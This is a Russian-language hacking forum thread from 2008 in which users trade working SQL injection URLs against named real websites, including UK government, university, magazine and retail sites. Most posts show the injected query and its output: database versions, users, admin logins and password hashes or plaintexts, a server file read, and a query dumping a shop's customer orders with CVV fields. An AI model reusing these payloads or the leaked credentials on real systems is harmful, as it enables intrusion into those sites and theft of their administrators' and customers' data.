ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7021  
Старый 06.12.2008, 21:09
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6--
5.0.67-log - harlem_5@209.68.4.232 - harlem_live

http://www.dissentmagazine.org/online.php?id=-1+union+select+1,concat(version(),char(32,45,32),u ser(),char(32,45,32),database()),3,4,5,6,7,8,9,10--
4.1.22 - dissent@localhost - dissent
 
Ответить с цитированием

  #7022  
Старый 07.12.2008, 00:04
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Адрес: polutona.ru (89.108.64.84)

Google PR 4 / 10
Яндекс тІЦ 500

Код:
http://polutona.ru/?show=reflect&number=-25+union+select+1,concat_ws(0x203a20,user(),version(),database())+from+news/*
User() polutonf_poluton@localhost
Version() 4.1.22-log
Database() polutonf_polutonf
 
Ответить с цитированием

  #7023  
Старый 07.12.2008, 04:39
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

yo.ru
Цитата:
http://yo.ru/element.php?element_id=-130+union+select+1,2,3,version(),5--&id=832
xxx.ru
Цитата:
http://www.xxx.ru/index.php?action=anketa&header=false&type=ind&id=-3316+union+select+1,2,3,4,concat_ws(0x3a,login,pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40+from+users++where+id=1+limit+0,1/*
http://www.xxx.ru/admin
admin:65536


password.ru
Цитата:
http://password.ru/index.php?date=27.11.2008&cat=-1+union+select+version()
password.ru/admin/admin.php
Цитата:
http://password.ru/index.php?date=27.11.2008&cat=-1+union+select+concat_ws(0x3a,name,value)+from+_co nfig
frame.ru
Цитата:
http://frame.ru/sqlmodel.php?index=-664+union+select+1,2,3,version(),5/*
infra.ru
Цитата:
http://infra.ru/fotogallery.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,user_password)))+from+jykwepb_forum.forum_use rs+where+user_level=1+limit+0,1
хешш разшифруйте и будет шелл )

tonnel.ru
Цитата:
http://www.tonnel.ru/?l=foto&foto=-2'+union+select+1,2,3,4,5,6,7,8,9,version(),11,12, 13,14,15/*
lolbot.ru
Цитата:
http://lolbot.ru/files/?c=1&s=2%20and%20(select%20ascii(substr(database() ,3,1))%20%20)%3E96%20and%201=1
 
Ответить с цитированием

  #7024  
Старый 07.12.2008, 11:27
Аватар для USAkid
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

Cageprisoners.com

Код:
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,version(),5,6--
version - 5.0.45

Код:
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+17,1--
- admins...

Код:
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,concat_ws(username,0x3a,password),5,6+from+admins--
Mr. Admin:QYYoUiD1cbIlTi2jPbgoQ0
 
Ответить с цитированием

  #7025  
Старый 07.12.2008, 12:55
Аватар для WAR!9G
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию

www.lv - Латвийский каталог, PR6

http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/*

http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(database( ),1),1),3,4,5,6/*
http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/**/from/**/resources/*

database: t_welcome
user: welcome@92.240.65.129
version: 4.1.15-Debian_1ubuntu5-log

http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(id,1),1), 3,4,5,6/**/from/**/resources/*
http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(lang,1),1 ),3,4,5,6/**/from/**/resources/*
http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(url,1),1) ,3,4,5,6/**/from/**/resources/*

http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/**/from/**/mysql.user/*
Код:
SELECT command denied to user 'welcome'@'92.240.65.129' for table 'user'
 
Ответить с цитированием

  #7026  
Старый 07.12.2008, 15:51
Аватар для bons
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

www.codurisursa.ro, тИЦ = 10

Код:
http://www.codurisursa.ro/print.php?id=-1+union+select+1,2,3,user(),5,6,7,8,database(),10,version(),12,13,14,15,16,17,18,19,20,21,22--
version() - 5.0.67-community-log
user() - scoduri_sc@localhost
database() - scoduri_sc

логины, хэши паролей админов и юзеров(все):

Код:
http://www.codurisursa.ro/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(id,0x3A,user,0x3A,password),10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+0,1--
1:admin:e4ea62f22090e998738d70a407f86cfc:bdvm

админка здесь: http://www.codurisursa.ro/admin.php

-----------------------

www.postindustrial.net, тИЦ = 210

Код:
http://www.postindustrial.net/content2/show_text.php?razdeli_id=0&table=books&sql=razdeli_show&lang=russian&books_id=-1+union+select+1,version(),database(),user(),5,6,7/*
version() - 4.0.26
user() - postindu@yox.hc.ru
database() - wwwpostindustria

-----------------------

www.uatm.com.ua, тИЦ = 110

Код:
http://www.uatm.com.ua/show_art.php?who=-1+union+select+1,2,3,concat(version(),':',database(),':',user()),5/*
version() - 4.0.27
database() - reg_registeredcomua
user() - regcomua@localhost
 
Ответить с цитированием

  #7027  
Старый 07.12.2008, 18:59
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.brotherblue.com/pages.php?pageid=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9+from+users/*
логин/пасс:
Код:
planettech:plpIT3xz.Z.KE
---------------------------------------------------------
Код:
http://www.goodbetterbestler.com/get-mike.php?GetID=-126+union+select+1,2,concat_ws(0x3a,username,0x3a,password)+from+users/*
логин/пасс:
Код:
mike:xxOUrOW68gTuM
----------------------------------------------------------
Код:
http://www.simbin.se/news.php?newsid=-84+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password),5+from+users/*
логин/пасс:
Код:
newsadmin:fb77bb3fb971d583ebb3cd8ddc61b299cecee108
------------------------------------------------------------
The End!
P.S.:Вроде не баян=)
P.S.S.:Скоро насобираю ещё=)))

Последний раз редактировалось -m0rgan-; 07.12.2008 в 19:01..
 
Ответить с цитированием

  #7028  
Старый 07.12.2008, 19:22
Аватар для Neoveneficus
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829

Репутация: 405
Отправить сообщение для Neoveneficus с помощью ICQ
По умолчанию

Вывод в <title>
(магазинчик)
Код:
http://www.spectrumaudio.com/manprods.php?id=-69+UNION+SELECT+1,CONCAT(ordID,0x3a,ordSessionID,0x3a,ordName,0x3a,ordAddress,0x3a,ordCity,0x3a,ordState,0x3a,ordZip,0x3a,ordCountry,0x3a,ordEmail,0x3a,ordPhone,0x3a,ordShipName,0x3a,ordShipAddress,0x3a,ordShipCity,0x3a,ordShipState,0x3a,ordShipZip,0x3a,ordShipCountry,0x3a,ordAuthNumber,ordAuthNumber,0x3a,ordAffiliate,0x3a,ordPayProvider,0x3a,ordShipping,0x3a,ordStateTax,0x3a,ordCountryTax,0x3a,ordHSTTax,0x3a,ordHandling,0x3a,ordShipType,0x3a,ordTotal,0x3a,ordDate,0x3a,ordIP,0x3a,ordDiscount,0x3a,ordDiscountText,0x3a,ordExtra1,0x3a,ordExtra2,0x3a,ordAddInfo,0x3a,ordComLoc,0x3a,ordStatus,0x3a,ordStatusDate,0x3a,ordStatusInfo,0x3a,ordAddress2,0x3a,ordShipAddress2,0x3a,ordExtra3,0x3a,ordTrackNum,0x3a,ordAVS,0x3a,ordCVV,0x3a,ordInvoice,0x3a,ordShipCarrier),3,4+FROM+spect9_spectrumaudio.orders+limit+0,1--
 
Ответить с цитированием

  #7029  
Старый 07.12.2008, 19:57
Аватар для Thrasher88
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Подскажите, как раскрутить скулю:
Код:
http://smartlip.com/symbian/fileshare/flist.php?cat=1'
Вроебы инъекция есть, но что то даже рабочие поля найти не получается (
 
Ответить с цитированием

  #7030  
Старый 07.12.2008, 20:05
Аватар для 0nep@t0p
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

www.sestran.gov.uk
Код:
http://www.sestran.gov.uk/news/article.php?ID=-17+union+select+1,concat(email,0x3a,password),3,4,5,6,7+from+admin_users--
Version: 5.0.67-community
User: Andy@localhost

www.pancsoc.org.uk
Код:
http://www.pancsoc.org.uk/showmeeting.php?id=61+union+select+1,2,concat(username,0x2e,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users+limit+1,1/*
Version: 5.0.22-Debian_0ubuntu6.06.5-log
User: Pancsoc@localhost

www.rugby.gov.uk
Код:
http://www.rugby.gov.uk/site/custom_scripts/wcsc_display.php?groupid=-453+union+select+load_file(0x453A5C50726F6772616D2046696C65735C4170616368652047726F75705C417061636865325C6A6164755C7075626C69635F68746D6C5C736974655C696E636C756465735C666F6F7465722E706870),2,3,4/*
Version: 4.1.21-community-nt
User: ufs@localhost

diglib.lib.utk.edu
Код:
http://diglib.lib.utk.edu/utj/browse.php?jid=1&vid=2&issid=5&aid=-211+union+select+1,2,3,4,5,sin(pi()/3)--
Version: 4.1.22
User: utjuser@localhost

www.crefal.edu.mx
Код:
http://www.crefal.edu.mx/noticias/noticia1.php?pagina=1&id=-111+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12/*
Version: 5.0.22
User: vmesa@yreri.crefal.edu.mx

www.boxclever.ca
Код:
http://www.boxclever.ca/news.php?id=75+and+1=3+union+select+1,2,convert(user(),binary),4,5/*
Version: 4.1.13a
User: boxclever.ca@localhost

www.metroeast.org
Код:
http://www.metroeast.org/articles/show.php?id=-132+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables/*
Version: 5.0.45
User: websitesql@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ